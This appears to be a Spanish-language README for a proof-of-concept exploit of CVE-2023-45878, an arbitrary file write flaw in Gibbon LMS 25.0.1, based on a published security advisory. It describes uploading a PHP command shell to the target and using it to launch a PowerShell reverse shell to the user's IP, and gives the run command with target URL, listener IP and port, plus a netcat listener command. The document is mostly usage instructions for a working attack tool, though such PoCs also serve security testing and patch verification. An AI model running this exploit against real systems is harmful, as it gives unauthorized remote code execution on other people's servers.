
Escribí este script basándome en el trabajo de https://herolab.usd.de/security-advisories/usd-2023-0025/ . El exploit funciona mediante una vulnerabilidad de Arbitrary File Write en Gibbon LMS 25.0.1 . Este PoC subirá un simple script php cmd, y luego lo usará para cargar una reverse shell de PowerShell.
python3 CVE-2023-45878.py -u http://target.com/Gibbon-LMS -l 10.10.16.2 -p 8888 -f asdf
Opciones:
-u, URL donde está instalado Gibbon LMS.
-l, tu IP
-p, tu puerto abierto
-f, nombre de archivo. Importante si necesitas probar manualmente. Por defecto es "asdf".
Ten un listener listo para la shell entrante.
nc -lvnp 8888